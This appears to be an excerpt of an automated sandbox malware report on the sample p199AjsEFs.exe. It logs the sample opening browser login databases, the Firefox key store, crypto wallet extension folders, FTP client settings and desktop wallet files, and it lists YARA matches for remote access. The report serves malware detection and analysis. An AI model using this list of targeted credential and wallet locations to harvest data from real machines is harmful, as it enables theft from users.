Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Roaming\FTPbox Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Roaming\FTPRush Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Directory queried: C:\Users\user\Documents\PALRGUCVEH Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Directory queried: C:\Users\user\Documents\PALRGUCVEH Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Directory queried: C:\Users\user\Documents\SUAVTZKNFL Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Directory queried: C:\Users\user\Documents\SUAVTZKNFL Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Directory queried: C:\Users\user\Documents\TQDFJHPUIU Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Directory queried: C:\Users\user\Documents\TQDFJHPUIU Jump to behavior
Source: Yara match File source: 00000000.00000003.2259799476.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: p199AjsEFs.exe PID: 2268, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: Process Memory Space: p199AjsEFs.exe PID: 2268, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 00000003.00000002.2438234450.0000000000331000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2449611202.000000000144E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2391784243.00000000050B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: HT94GNC6NP3AGR6EM8I9D3647.exe PID: 6316, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP